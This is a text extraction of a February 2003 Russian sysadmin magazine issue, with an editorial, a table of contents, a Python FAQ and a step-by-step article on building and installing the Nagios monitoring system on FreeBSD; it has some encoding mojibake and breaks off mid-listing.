№2(3) февраль 2003

журнал для cистемных администраторов,

вебмастеров и программистов

Империя Cisco
Абсолютно все о
технологии ISDN
Практика OpenSSL
Создание
простейшей
биллинговой
системы
Пакетный фильтр
OpenLDAP и защита
данных
Безопасность
технологии
виртуальных карт
 Кто такой «Системный администратор»?
Этот вопрос мне приходится слышать все чаще и чаще. Ответ оказывается далеко не триви-
альным, особенно при внимательном рассмотрении.
Первые ассоциации, возникающие у различных людей при этом вопросе: системный адми-
нистратор – «эникейщик», специальный человек, который бегает по офису и решает частые
тривиальные проблемы пользователей (сам термин возник в период различных версий DOS,
когда множество пользователей на надпись «Press any key to continue» нажимали на reset).
Зачастую это либо студенты – начинающие системные администраторы, либо люди, для ко-
торых системное администрирование не основное занятие (я на такой работе видел поэта). При
повышении профессионального уровня эти люди переходят в разряд выше.
Следующий тип системных администраторов – человек, отвечающий за работу оргтехники в
компании, обычно образование не ниже средне-специального, любит возиться с компьютерной
техникой, часто собирает и разбирает эти конструкторы. В довесок протягивает локальные сети.
В виде отдельной должности встречается в крупных компаниях.
«Зачем вы печатаете статьи про настройку ПО?», – пишут они в редакцию, – «печатайте про
настройку железа».
Другие системные администраторы возражают. Это как раз те люди, которые отвечают за
работоспособность системы, установку и настройку различных операционых систем.
Дальше эта группа делится на людей, склонных к программированию, и просто администра-
торов. Администраторы, получившие подготовку по программированию, стремятся быстро все
сделать руками, поправить неработающую процедуру установки, переписать некорректный
скрипт. Им легче в *nix-системах, особенно открытых. Другой тип стремится использовать спе-
циализированные утилиты, но вряд ли полезет внутрь программы «ради интереса». Им вполне
комфортно живется и под win-системами.
Последний тип администраторов – «гуру», «отец», «душа компании» – совмещает в себе зна-
ние «железа» и «софта», обычно склонен к программированию, одна из почти обязательных
сторон – веб-программирование. Написание и поддержка сайта на каком-либо скриптовом язы-
ке с использованием базы данных для него не является непосильной задачей. Попутно может
настроить сеть так, что к ней не надо будет прикасаться в течение года. И самое главное, он
может разговаривать с начальством. Может аргументированно обьяснить, почему требуется
модернизация, рассчитать, к каким выигрышам это приведет, к каким потерям приведет её от-
сутствие.
А как вы ответите на этот вопрос? Кто для вас «Системный админстратор»?
Ждем ваших ответов и пожеланий на форуме нашего сайта WWW.SAMAG.RU.
 содержание

Установка Nagios Практика OpenSSL

Андрей Бешков Всеволод Стахов
tigrisha@sysadmins.ru CEBKA@smtp.ru
6 32
Восстановление загрузки операционной Почтовый фильтр или Milter = Mail + Filter
системы Linux Роман Сузи
Андрей Шевченко rnd@onego.ru
andy_shev@mail.ru 38
15
Создание простейшей биллинговой системы
Империя Cisco Денис Мясниченко
Денис Еланский velial@trophy.com.ua
grosm@samag.ru 42
16
Устанавливаем Multiple-Device-дозвон в
Абсолютно все о технологии ISDN Windows XP
Сергей Ропчан Татьяна Антипова
fenix@sit-ua.com antipova@samag.ru
20 47
Как пингвин говорит по телефону, Мифы и легенды современной ОCологии…
или или
Настройка dialin-сервера для доступа в «ОС – это большой полосатый мух?»
Интернет и аварийной консоли Александр Потемкин
Андрей Мозговой apotemkin@itinfo.spb.ru
brain@m9.ru 48
26
2
 содержание

Брандмауэр (часть II) OpenLDAP и защита данных

Владимир Мешков Всеволод Стахов
ubob@mail.ru CEBKA@smtp.ru
54 74
Пакетный фильтр Безопасность технологии виртуальных карт
Владимир Мешков Сергей Ропчан
ubob@mail.ru fenix@sit-ua.com
60 86
Java: магия отражений (часть III) IMHO
Компиляция Java средствами Java
Даниил Алиевский Этика сисадмина
daniel@siams.com Андрей Гуселетов
64 gus@horizont.com.ua
90
FAQ Python
4, 93
FAQ MySQL
25
BUGTRAQ
85, 89, 94

№2(3), февраль 2003 3

 FAQ Python
ВОПРОС:
Python распространяется по лицензии программного
обеспечения с открытым исходным кодом, а можно ли для
него писать коммерческие программы?
ОТВЕТ:
Лицензия на Python не ограничивает его использова-
ния в каких-либо проектах. Если в вашем продукте ис-
пользован Python, достаточно указать этот факт как в
самом продукте, так и в сопровождающей его докумен-
тации. Подробности в лицензии.
ВОПРОС:
Как превратить шестнадцатеричное представление IP-
адреса в строку байт? В «точечное» представление?
ОТВЕТ:
import binascii binascii.a2b_hex(“E786AA80”)
«.».join(map(str, map(ord, binascii.a2b_hex(“E786AA80”))))
Примечание: функция map(f, s) применяет функцию f
к каждому элементу последовательности s.
ВОПРОС: Как из Python узнать IP-адрес хоста?
ОТВЕТ:
import socket socket.gethostbyname(“www.host.ru”)
ВОПРОС:
С помощью какой функции можно проверить существо-
вание файла или каталога?
ОТВЕТ:
import os if os.access(«/path/to/file», os.F_OK): # ôàéë
äîñòóïåí
ВОПРОС:
Как убрать проценты из записи URL?
ОТВЕТ:
import urllib urllib.unquote(«http://www.host.ru/
%61%62%63»)
ВОПРОС:
Как в Python 2.x изменить кодировку текста в строке?
ОТВЕТ:
Например, перекодировку из KOI8-R в CP1251 можно
сделать посредством Unicode:
unicode(«ÂÎÏÐÎÑ», «koi8-r»).encode(«cp1251»)
ВОПРОС:
Почему получается такой результат?
>>> l = [[0]*2]*2 >>> l [[0, 0], [0, 0]] >>> l[0][0] = 1
>>> l [[1, 0], [1, 0]]
4
ОТВЕТ:
Объекты списка, участвующие в репликации, копиру-
ются поверхностно. Таким образом, список l состоит из двух
«ссылок» на один и тот же объект. Соответственно, изме-
нение этого объекта дает такой неожиданный результат.
ВОПРОС:
Есть ли в Python тип данных массив?
ОТВЕТ:
Обычно в Python используется более гибкая встроен-
ная структура данных – список. Если вам действительно
нужны массивы, в стандартной библиотеке Python есть
модуль array для работы с массивами чисел и символов.
Для эффективной работы с массивами данных лучше ис-
пользовать пакет Numeric Python. Его можно найти на http:/
/numpy.sourceforge.net.
ВОПРОС:
В Python нет встроенного типа данных для множеств.
Чем можно его заменить?
ОТВЕТ:
Множества можно легко эмулировать с помощью
словарей:
# èíèöèàëèçèðóåì äâà ìíîæåñòâà # (ïîâòîðû áóäóò àâòîìàòè-
÷åñêè óáðàíû, # òàê êàê îäíîìó êëþ÷ó ìîæåò ñîîòâåòñòâîâàòü #
òîëüêî îäíî çíà÷åíèå) set = {} for e in [1,2,3,4,1,5,6,1,4]:
set[e] = 1 set1 = {} for e in [3,4,5,6]: set1[e] = 1
set.keys() # ñïèñîê ýëåìåíòîâ ìíîæåñòâà set.has_key(5)
# ïðîâåðêà ïðèíàäëåæíîñòè ìíîæåñòâó set.update(set1) #
îáúåäèíåíèå ìíîæåñòâ (ðåçóëüòàò â set)
# ïåðåñå÷åíèå ìíîæåñòâ: set2 = {} for e in set.keys(): if
set1.has_key(e): set2[e] = 1
Кроме того, класс множество с различными операци-
ями можно легко запрограммировать. См., например, ре-
цепт на http://aspn.activestate.com/ASPN/Cookbook/Python/
Recipe/106469.
ВОПРОС:
Как вставить в строку значения переменных по анало-
гии с «$var» в Perl или sh?
ОТВЕТ:
Можно использовать операцию форматирования и сло-
варь переменных vars() следующим образом (для иллюс-
трации команды выполнены в диалоговом режиме интер-
претатора Python):
>>> a, b, c = 2, «text», 12.4 >>> print «»»a: %(a)05i, b:
%(b)s, c: %(c)8.2f»»» % vars() a: 00002, b: text, c:
12.40
Для строкового литерала были использованы утроен-
ные кавычки: это позволяет использовать внутри строки
одиночные кавычки и апострофы без дополнительного эк-
ранирования, а также задавать текст на нескольких стро-
ках.
Составил Роман Сузи
 администрирование

УСТАНОВКА NAGIOS
АНДРЕЙ БЕШКОВ
С увеличением размера подконтрольных сетей перед каждым администратором встает вопрос о
создании единой системы мониторинга серверов и сервисов. Внедрение такой системы позволит
повысить производительность работы компании и уменьшить время простоя оборудования.
Несмотря на свои неоспоримые достоинства, коммерческие системы вроде Solar Winds, 3COM
Network Superviser и HP OpenView в данной статье рассматриваться не будут из-за своих довольно
высоких цен. В Сети существует множество бесплатных систем мониторинга. Наиболее
известными являются Nagios, Big Brother, Angel Network Monitor, HiWayS, MARS, Autostatus,
NocMonitor, RITW. Для выполнения вышеописанной задачи мы будем использовать инструмент по
имени Nagios.

Давайте рассмотрим главные зада-
чи системы мониторинга. Она дол-
жна оповещать администратора с
помощью электронной почты, пейд-
жера или sms-сообщений, если с на-
блюдаемыми объектами случаются
какие-либо неприятности. Также
оповещения должны отсылаться,
когда состояние объекта возвра-
щается в норму. Вдобавок ко всем
способам, перечисленным выше,
Nagios позволяет использовать в ка-
честве инструмента оповещения
программы, разработанные пользо-
вателями. Перед тем как мы станем
более подробно обсуждать возмож-
ности Nagios, вам стоит посмотреть
на демонстрационную систему, ко-
торую Tom Welsh установил специ-
ально для этих нужд. Быстренько
идем на сайт http://nagios.square-
box.com/. Для авторизации исполь-
зуем имя пользователя guest и па-
роль guest. Набродившись по раз-
ным меню и полюбовавшись на все
красоты веб-интерфейса, давайте
поговорим о достоинствах Nagios.
На основе увиденного мы можем
сделать выводы:

Nagios позволяет производить мо-
ниторинг таких сетевых сервисов,
как SMTP, TELNET, SSH, HTTP,
DNS, POP3, IMAP, NNTP и многих
других.

Можно следить за использовани-
ем ресурсов серверов, таких как
расход дискового пространства,
свободная память и загруженность
процессора.

Существует возможность созда-
вать свои собственные обработчи-
ки событий.
Эти обработчики будут выполнять-
ся при возникновении тех или иных
событий, инициированных провер-
ками сервисов или серверов. Такой
подход позволит активно реагиро-
вать на происходящие события и
пытаться автоматически решать
возникшие проблемы. К примеру,
можно создать обработчик событий,
который будет самостоятельно пе-
резапускать повисший сервис.
Еще одним достоинством системы
мониторинга Nagios является возмож-
ность управлять ею удаленно с помо-
щью wap-интерфейса мобильного те-
лефона. Используя концепцию “роди-
тельских” хостов, легко описать
иерархию и зависимости между все-
ми хостами. Такой подход чрезвычай-
но полезен для больших сетей, пото-
му что позволяет производить слож-
ную диагностику. А это качество, в
свою очередь, помогает отличить не-
работающие хосты от тех, что недо-
ступны в данный момент из-за непо-
ладок в работе промежуточных зве-
ньев. Nagios умеет строить графики
работы наблюдаемых систем и карты
контролируемой сетевой инфраструк-
туры.
Из своей практики работы с Nagios
приведу пример, показывающий, на-
сколько полезен он оказался для
меня. На внешнем сетевом интерфей-
се нашего брандмауэра с периодич-
ностью в несколько часов начиналась
потеря пакетов. Из-за неисправности
терялось до 20% проходящего трафи-
ка. По истечении минуты-другой ин-
терфейс снова начинал работать как
положено. По причине плавающего
характера этой неполадки несколько
недель я не мог понять, почему при
работе с Интернетом периодически
происходят кратковременные сбои.
Без Nagios поиск неисправности за-
тянулся бы надолго.
Многим из администраторов хоро-
шо знаком предок Nagios по имени
NetSaint. Несмотря на то что сайт про-
екта NetSaint все еще исправно фун-
кционирует, новые разработки бази-
руются уже на исходном коде Nagios.
Поэтому всем рекомендуется поти-
хоньку перебираться на Nagios. Изна-
чально проект разрабатывался для
Linux, но наша система мониторинга
будет работать на основе FreeBSD
4.5. В документации, поставляемой с

6

Nagios, говорится, что он будет ста-
бильно работать и со многими други-
ми Unix-подобными системами. Для
отображения веб-интерфейса Nagios
нам понадобится сервер Apache. Вы
вольны использовать любой другой,
но в данной статье будет рассматри-
ваться именно Apache, как наиболее
распространенный на Unix-платфор-
мах веб-сервер. Можно установить
систему мониторинга вообще без веб-
интерфейса, но мы так делать не ста-
нем, потому что это существенно
уменьшает удобство пользования.
Для создания графиков нам пона-
добится библиотека GD Graphics, ко-
торую написал Thomas Boutell. Она
необходима для создания изображе-
ний в формате PNG, JPEG и WBMP.
WBMP чаще всего используется кли-
ентами беспроводных устройств. По-
давляющее большинство браузеров
пока не умеет работать с WBMP, по-
этому для нас он интереса не пред-
ставляет. До перехода на версию 2.0.6
была возможность работать с форма-
том GIF, но от нее пришлось отказать-
ся из-за проблем с патентным зако-
нодательством. Для сжатия информа-
ции внутри изображений GIF исполь-
зуется алгоритм LZW. Эксклюзивны-
ми правами на него обладает Unisys.
В связи с вышеуказанными пробле-
мами, сетевому сообществу рекомен-
дуется использовать свободные от
подобных неудобств форматы PNG и
JPEG. В свою очередь, библиотека GD
опирается на библиотеки zlib, LibPng
и jpeg. У нас есть три пути, следуя
которым мы можем установить все
необходимые библиотеки. В статье
они будут подробно описаны по оче-
реди. Я люблю все собирать и уста-
навливать вручную, потому как подоб-
ный подход дает более полное пони-
мание происходящих процессов и воз-
можность использовать самое свежее
программное обеспечение. Итак, нач-
нем нашу эпопею со способа, красно-
речиво называемого в народе «закат
солнца вручную».
Первый ингредиент – библиотека
zlib, написанная двумя программиста-
ми – Jean-loup Gailly и Mark Adler. Она
проектировалась как API общего на-
значения для сжатия данных без по-
терь. Как ни странно, но в нашем про-
екте она будет использоваться по сво-
ему прямому назначению, то есть для
№2(3), февраль 2003
сжатия изображений. Берем новей-
шую версию http://www.gzip.org/zlib/.
На момент написания это была 1.1.4.
Распаковываем и компилируем.
# tar zvxf zlib-1.1.4.tar.gz
# cd zlib-1.1.4
# ./configure
# make test
# make install
Как вы могли бы предположить,
LibPng служит для создания изобра-
жений в формате PNG. Я использо-
вал версию 1.2.5. Взять ее можно на
сайте: http://www.graphicswiz.com/
png/libpng.html.
Собирается LibPng довольно-таки
странным и нестандартным путем.
# tar zxvf libpng-1.2.5.tar.gz
# cd libpng-1.2.5
Ориентируясь на тип операцион-
ной системы, из директории scripts
выбираем нужный нам makefile и ко-
пируем его в директорию с исходны-
ми файлами. Для нашего случая ис-
ходный файл называется make-
file.freebsd.
# cp ./scripts/makefile.freebsd
makefile
Затем создаем директорию zlib и
кладем в нее из дистрибутива zlib все
файлы с расширением *.h:
# mkdir zlib
Вот теперь можно проводить компи-
ляцию. Что мы с радостью выполняем.
# make all
# make test
В результате на экране вы долж-
ны увидеть что-то вроде этого:
Testing pngtest.png:
Pass 0: rwrwrwrwrwrwrwrwrw
Pass 1: rwrwrwrwrwrwrwrwrw
Pass 2: rwrwrwrwrwrwrwrw
Pass 3: rwrwrwrwrwrwrwrwrwrwrwrwrw
rwrwrwrwrw
Pass 4: rwrwrwrwrwrwrwrwrwrwrwrwrw
rwrwrwrwrw
Pass 5: rwrwrwrwrwrwrwrwrwrwrwrwrw
rwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrw
Pass 6: rwrwrwrwrwrwrwrwrwrwrwrwrw
rwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrw
PASS (9782 zero samples)
Filter 0 was used 21 times
Filter 1 was used 15 times
Filter 2 was used 52 times
администрирование
Filter 3 was used 10 times
Filter 4 was used 33 times
tIME = 7 Jun 1996 17:58:08 +0000
Current memory allocation:
0 bytes
Maximum memory allocation:
337346 bytes
Total memory allocation:
1023516 bytes
Number of allocations:
198
libpng passes test
mkdir /usr/local/include/libpng
И наконец, пришло время инстал-
ляции. Тут уж все должно пройти лег-
ко и просто.
# make install
Теперь берем по адресу http://
www.ijg.org/files/ библиотеку jpeg
версии 6b. Я надеюсь, самые догад-
ливые читатели уже поняли, что она
понадобится нам для создания изоб-
ражений в формате jpeg. Поверив
моим заявлениям о том, что проце-
дура установки довольно проста,
начнем ее выполнение.
# tar zxvf jpegsrc.v6b.tar.gz
# cd jpeg-6b
# ./configure
# make
После тестовой сборки должны
увидеть такую картину:
# make test
rm -f testout*
./djpeg -dct int -ppm -outfile
testout.ppm ./testorig.jpg
./djpeg -dct int -bmp -colors 256
-outfile testout.bmp ./testorig.jpg
./cjpeg -dct int -outfile
testout.jpg ./testimg.ppm
./djpeg -dct int -ppm -outfile
testoutp.ppm ./testprog.jpg
./cjpeg -dct int -progressive -opt
-outfile testoutp.jpg ./testimg.ppm
./jpegtran -outfile testoutt.jpg ./
testprog.jpg
cmp ./testimg.ppm testout.ppm
cmp ./testimg.bmp testout.bmp
cmp ./testimg.jpg testout.jpg
cmp ./testimg.ppm testoutp.ppm
cmp ./testimgp.jpg testoutp.jpg
cmp ./testorig.jpg testoutt.jpg
Следующей командой устанавли-
ваем библиотеку jpeg.
# make install
Наконец, после всех этих мы-
тарств, можно заняться инсталля-
цией библиотеки GD. Скачиваем
исходные тексты с сайта проекта
http://www.boutell.com/gd/. Как все-
гда, распаковываем и конфигуриру-
ем дистрибутив.
7
 администрирование
# tar zxvf gd-2.0.6.tar.gz
# cd gd-2.0.6
# ./configure --x-includes=/usr/
local/include --x-libraries=/usr/
local/lib
Ключи –x-includes и –x-libraries ука-
зывают скрипту конфигурации, где у
нас находятся заголовочные и биб-
лиотечные файлы всех установлен-
ных ранее библиотек.
# make all
Если компиляция завершилась с
ошибками, то нам необходимо уда-
лить временные файлы, созданные в
процессе работы команды make.
# make devclean
После выполнения чистки нужно
принять меры к устранению причин
возникновения ошибок. При необхо-
димости подправьте ключи команды
configure, а затем проведите повтор-
ную компиляцию. И если предыдущие
шаги завершились нормально, запус-
каем инсталляцию.
# make install
Теперь давайте обсудим второй
способ установки. При наличии устой-
чивого соединения с Интернетом мож-
но попытаться установить библиоте-
ки GD, zlib, LibPng и jpeg с помощью
механизма портов. Мы запустим ус-
тановку GD, а она, в свою очередь,
автоматически выполнит скачивание,
компиляцию и установку всех необхо-
димых библиотек на основе зависи-
мостей между ними.
# cd /usr/ports/graphics/gd
# make install
Третий способ установки не тре-
бует подключения к сети Интернет.
Скорее всего, он является самым
простым и, видимо, лучше всего
подходит для начинающих админи-
страторов. Как и во втором спосо-
бе, все необходимое будет автома-
тически установлено из пакетов, по-
ставляющихся вместе с операцион-
ной системой FreeBSD. По аналогии
со вторым способом за удобство
придется заплатить свежестью ус-
танавливаемого программного
8
обеспечения. В CD-привод кладем
компакт диск с пакетами и запуска-
ем программу sysinstall.
# /stand/sysinstall
А затем, последовательно пройдя
через все перечисленные ниже меню,
выполняем инсталляцию.
Configure->Packages->CD/DVD-
>graphics->gd-1.8.4_3->ok->install->ok
Аналогичного эффекта можно до-
биться, используя команду pkg_add.
Посмотрим, куда у нас все это уста-
новилось. Файлы библиотек лежат
в /usr/local/lib, а заголовочные фай-
лы в – /usr/local/include/gd. Не стоит
огорчаться, если, несмотря на все
попытки, библиотеку GD не удалось
установить ни одним из трех спосо-
бов. Хотя я с трудом представляю,
как такое возможно. Отложите уста-
новку до лучших времен. Наличие
вышеназванных библиотек необхо-
димо только для правильной рабо-
ты модулей построения графиков и
генерирования сетевой карты.
Nagios работает стабильно и оста-
ется очень полезным инструментом
даже без этих модулей.
Пришло время детально разоб-
раться с архитектурой системы мони-
торинга. Обычно комплекс на основе
Nagios состоит из двух частей: глав-
ной программы, в документации чаще
всего называемой core program, и под-
ключаемых модулей, соответственно
plugins. Модульный дизайн позволяет
отделить логику основной программы
от процесса выполнения проверок.
Это, в свою очередь, дает возмож-
ность всем желающим без особых
усилий расширять область примене-
ния Nagios через написание собствен-
ных подключаемых модулей.
Скачиваем последнюю версию
главной программы и подключаемых
модулей с официального сайта про-
екта http://www.nagios.org/download.
На момент написания статьи были
доступны версии nagios-1.0b6 и
nagiosplug-1.3-beta1. Засучив рукава,
приступим к установке главной про-
граммы.
# tar zxvf nagios-1.0b6.tar.gz
# cd nagios-1.0b6
Теперь нужно решить, в какой ка-
талог мы хотим инсталлировать
Nagios. По умолчанию предполагает-
ся каталог /usr/local/nagios/. Думаю,
нам тоже стоит придерживаться его,
потому что в прилагающейся к дист-
рибутиву документации указан имен-
но этот каталог. При последующем
устранении ошибок или проблем с кон-
фигурированием будет гораздо проще
читать документацию. Создаем ката-
лог, куда мы впоследствии будем про-
водить инсталляцию. Не совсем понят-
но, почему ее должен создавать адми-
нистратор, а не программа инсталля-
ции. Надеюсь, в следующих версиях
этот недочет будет исправлен.
# mkdir /usr/local/nagios
С помощью скрипта adduser либо
каким-нибудь другим способом созда-
ем пользователя nagios, состоящего
в группе nagios.
# adduser nagios
# ./configure --prefix=/usr/local/
nagios --with-cgi-url=/nagios/cgi-bin
--with-html-url=/nagios/ \
--with-nagios-user=nagios --with-
nagios-grp=nagios --with-gd-lib=/usr/
local/lib \
--with-gd-inc=/usr/local/include/gd
Давайте быстренько разберемся с
назначением используемых при кон-
фигурировании ключей.

—prefix=/usr/local/nagios – сюда
мы будем устанавливать файлы
после компиляции. Вот и пригоди-
лась созданная вручную директо-
рия /usr/local/nagios.

—with-cgi-url=/nagios/cgi-bin – URL,
с помощью которого мы будем об-
ращаться к CGI-скриптам веб-ин-
терфейса nagios. В конце URL сим-
вол «/» добавлять не нужно. В ка-
честве примера для вымышленно-
го сайта somesite.ru можно приве-
сти абсолютный URL одного из
CGI-скриптов httt://somesite.ru/
nagios/cgi-bin/statusmap.cgi.

—with-html-url=/nagios/ – URL, где
будут находиться html-файлы, в ко-
торых хранятся главное меню веб-
интерфейса и документация.

—with-nagios-user=nagios – пользо-
ватель, которому будут принадле-
жать файлы инсталляции.

—with-nagios-grp=nagios – соответ-
ственно группа этого пользователя.


—with-gd-lib=/usr/local/lib – тут у нас
лежит библиотека GD.

—with-gd-inc=/usr/local/include/gd –
а здесь находятся ее заголовоч-
ные файлы.
Осмыслив все прочитанное и разоб-
равшись с опциями команды configure,
проводим сборку и инсталляцию.
# make all
# make install
Следующий шаг является необя-
зательным, но желательно его все
же выполнить. С помощью команды
make install-init можно создать
скрипт, который будет выполнять за-
пуск Nagios после перезагрузки сис-
темы. Вдобавок к этому у нас появит-
ся возможность управлять работой
процесса Nagios с помощью команд
stop, reload, start, restart, reload,
force-reload. Давайте подробнее рас-
смотрим каждую из этих команд:

start – запускает процесс Nagios;

stop – останавливает текущий про-
цесс Nagios;

restart – останавливает выполня-
ющийся процесс Nagios и запус-
кает новый;

reload – отправляет процессу Nagios
сигнал SIGHUP, заставляя его пере-
читать конфигурационные файлы, а
затем продолжить мониторинг;

force-reload – производит принуди-
тельную перезагрузку конфигура-
ционных файлов;

status – показывает статус рабо-
тающего процесса.
Для FreeBSD файл скрипта должен
располагаться в директории /usr/local/
etc/rc.d и называться nagios.sh. В зави-
симости от типа операционной систе-
мы, инсталлятор должен сам выбрать
подходящие права доступа, местополо-
жение и имя скрипта. Например, для
систем на основе Slackware должны по-
лучить соответственно /etc/rc.d/init.d и
rc.nagios. Ну что же, давайте попыта-
емся выполнить установку скрипта.
# make install-init
Получаем следующие ошибки:
/usr/bin/install -c -m 755 -d -o
root -g root /usr/local/etc/rc.d
install: unknown group root
№2(3), февраль 2003
*** Error code 67
Stop in /tmp/nagios-1.0b6.
Жаль, но установка с наскоку не
удалась. Ну и ладно, вот исправим
ошибки программистов, писавших
скрипт, и все заработает как надо. С
помощью любимого текстового редак-
тора начинаем редактировать файл
Makefile. Идем на строку 32 и ищем
символы:
INIT_OPTS=-o root -g root
Обдумав увиденную строку, по-
нимаем, что под FreeBSD пользова-
тель root входит в группу wheel. Вно-
сим изменения.
INIT_OPTS=-o root -g wheel
Переходим на строку 154:
$(INSTALL) -m 774 $(INIT_OPTS)
daemon-init $(DESTDIR)$(INIT_DIR)/
nagios
Правильно задаем имя файла
nagios.sh вместо nagios. Не стоит да-
вать общий доступ на чтение для фай-
ла скрипта. Вполне хватит режима
доступа 100. Измененная строка бу-
дет выглядеть так:
$(INSTALL) -m 100 $(INIT_OPTS)
daemon-init $(DESTDIR)$(INIT_DIR)/
nagios.sh
Сохраняем файл и снова выполня-
ем команду инсталляции.
# make install-init
Итак, скрипт автозапуска создан,
но он все еще не готов к работе. Все
дело в том, что при перезагрузке
файл nagios.sh будет выполнен без
единого параметра командной стро-
ки, а для безукоризненной работы
нужно запускать его с параметром
start. Сейчас мы это исправим. От-
крываем файл для редактирования
и выполняем поиск строки:
echo "Usage: nagios
{start|stop|restart|reload|force-
reload|status}"
Затем сразу после нее вставляем
вот это:
/usr/local/etc/rc.d/nagios.sh start
администрирование
Внесенными изменениями мы за-
ставляем nagios.sh, запущеный без
обязательных параметров, рекурсив-
но выполнить самого себя с парамет-
ром start.
Еще одна ошибка – это путь к фай-
лу, в котором будут храниться вне-
шние команды, переданные на выпол-
нение процессу Nagios. После инстал-
ляции подразумевается, что файл
должен располагаться в /usr/local/
nagios/var/rw/nagios.cmd. Но, к сожа-
лению, директория /usr/local/nagios/
var/rw/ автоматически не создается. К
тому же не совсем понятен смысл со-
здания отдельной директории для
единственного файла nagios.cmd.
Чтобы исправить вышеуказанную
ошибку, ищем строку:
NagiosCmd=${prefix}/var/rw/
nagios.cmd
и заменяем ее на такую:
NagiosCmd=${prefix}/var/nagios.cmd
Теперь файл nagios.cmd будет со-
здаваться в директории /usr/local/
nagios/var/.
К сожалению, это не последняя
проблема, связанная с файлом
nagios.cmd. При каждом перезапуске
процесса Nagios файл внешних ко-
манд сначала удаляется, а затем со-
здается вновь. Беда в том, что созда-
ется nagios.cmd с правами процесса.
Соответственно, он принадлежит
пользователю nagios и группе nagios.
На первый взгляд, здесь нет никакой
проблемы. Поразмышляв некоторое
время, мы понимаем, что главным
поставщиком внешних команд для
процесса Nagios будет веб-интер-
фейс. Сервер Apache обычно запус-
кается с правами пользователя
nobody группы nogroup. А это значит,
что процесс веб-сервера не сможет
вносить новые данные в файл
nagios.cmd. Самым простым решени-
ем было бы дать доступ на запись
всем, но с точки зрения безопаснос-
ти такое решение выглядит довольно
неприглядно. Вторым способом раз-
решения конфликта могло бы стать
введение пользователя nobody в груп-
пу nagios. Но с безопасностью опять
возникают неувязки. Самым лучшим
выходом из этой ситуации является
9
 администрирование
частичная передача прав на файл
пользователю nobody. В результате
такой операции файлом должен вла-
деть пользователь nobody и группа
nagios. Таким образом, доступ к фай-
лу получат и процесс nagios, и веб-
сервер. Ищем в файле nagios.sh вот
такие строки:
sleep 1
status_nagios nagios
и добавляем сразу за ними команду:
chown nobody $NagiosCmd
Покончив с файлом nagios.sh, мож-
но быть уверенным, что уж теперь-то
он будет работать как положено.
Заглянув в директорию /usr/local/
nagios/, мы видим, что после инстал-
ляции внутри нее образовалось еще
5 директорий.
# ls /usr/local/nagios
bin etc sbin share
Опишем, для чего нужна каждая
из этих директорий:

bin – здесь находится выполняе-
мый файл основной программы.
Он же демон Nagios;

etc – конфигурационные файлы;

sbin – тут лежат файлы CGI для
веб-интерфейса;

share – здесь находятся html-фай-
лы веб-интерфейса и документа-
ция;

var – файлы протоколов и данные
о состоянии проверяемых объек-
тов.
С помощью команды make install-
config создаем файлы конфгурации,
заполняем их значениями по умолча-
нию и помещаем в директорию /usr/
local/nagios/etc/.
# make install-config
Можете поздравить себя с оконча-
нием установки главной программы
Nagios. Можно было сделать все то же
самое с помощью портов или пакетов.
К сожалению, на такой способ уста-
новки времени у меня не хватило. По-
этому сказать об удобстве или под-
водных камнях такого пути ничего не
могу. Есть подозрение, что возможно
10
возникновение проблем с конфигури-
рованием, да и свежесть установлен-
ного программного обеспечения бу-
дет весьма сомнительна. Еще одной
причиной не использовать порты ста-
ло желание заняться русификацией
системы. Подробнее о результатах
этого эксперимента будет рассказа-
но в следующей статье.
Несмотря на то что инсталляция
главной программы закончена, тол-
ку нам от этого пока никакого. Без
установленных модулей Nagios со-
вершенно бесполезен, так как не
имеет возможности взаимодейство-
вать с объектами, за которыми нуж-
но наблюдать. Настало время при-
няться за инсталляцию этих самых
модулей. С помощью make, постав-
лявшегося вместе с операционной
системой, собрать их не удалось.
Посему для компиляции будем
пользоваться gmake.
# tar zxvf nagiosplug-1.3-
var beta1.tar.gz
# cd nagiosplug-1.3-beta1
# ./configure --prefix=/usr/local/
nagios --with-nagios-user=nagios --
with-nagios-grp=nagios
Значение ключей конфигурации
аналогично тем, что мы использова-
ли при компиляции главной програм-
мы. Почитать детальные объяснения
о назначении каждого ключа можно с
помощью команды ./configure –help.
# gmake all
# gmake install
После компиляции подключаемые
модули устанавливаются в директо-
рию /usr/local/nagios/libexec. Некото-
рые из них написаны на С, другие на
perl. В принципе модуль может быть
написан на любом языке. Каждый
модуль является выполняемым фай-
лом. Это дает возможность исполь-
зовать модули не только в комплек-
се с Nagios, но и с другими програм-
мами. Можно выполнять проверки
даже из командной строки. Каждый
модуль должен поддерживать опцию
–help или -h, иначе он не может счи-
таться совместимым с Nagios. Такие
жесткие требования позволяют лег-
ко разобраться с любым модулем.
Давайте посмотрим, какие парамет-
ры командной строки должен полу-
чать модуль check_dns.
# check_dns -h
check_dns (nagios-plugins 1.3.0-
alpha1) 1.1.1.1
The nagios plugins come with
ABSOLUTELY NO WARRANTY. You may
redistribute copies of the plugins
under the terms of the GNU General
Public License.
For more information about these
matters, see the file named COPYING.
Copyright (c) 1999 Ethan Galstad
(nagios@nagios.org)
Usage: check_dns -H host [-s
server] [-t timeout]
check_dns --help
check_dns --version
-H, --hostname=HOST
The name or address you want to
query
-s, --server=HOST
Optional DNS server you want to
use for the lookup
-t, --timeout=INTEGER
Seconds before connection times
out (default: 10)
-h, --help
Print detailed help
-V, --version
Print version numbers and
license information
This plugin uses the nslookup program
to obtain the IP address for the given
host/domain query. A optional DNS
server to use may be specified. If no
DNS server is specified, the default
server(s) specified in /etc/resolv.conf
will be used.
Прочитав и обдумав вывод преды-
дущей команды, можно понять, что мо-
дуль check_dns принимает один обя-
зательный параметр –H и два необя-
зательных параметра -s, -t. Итак, по по-
рядку: –H – имя или адрес проверяе-
мого хоста. В параметре -s определя-
ется адрес сервера DNS, используемо-
го для перевода имени в адрес, если в
первом параметре вместо адреса пе-
редано имя хоста. Затем -t устанавли-
вает тайм-аут, по истечении которого
служба считается нефункционирую-
щей. Для проверки сервиса DNS ма-
шины с адресом 192.168.10.254 нуж-
но выполнить следующую команду:
# check_dns -H 192.168.10.254
DNS ok - 0 seconds response time,
Address(es) is/are 192.168.10.254
Инт уиция с транным образом
подсказывает мне, что DNS рабо-
тает нормально.
Закончив установку и разобрав-
шись с механизмом работы подклю-
чаемых модулей, перейдем к на-
стройке Nagios. Давайте осмотрим
содержимое директории конфигура-
ционных файлов.
# cd /usr/local/nagios/etc
 администрирование
# ll -rw-rw-r-- 1 nagios nagios 1594 # Ññûëêà íà èñïîëüçóåìûé øàáëîí
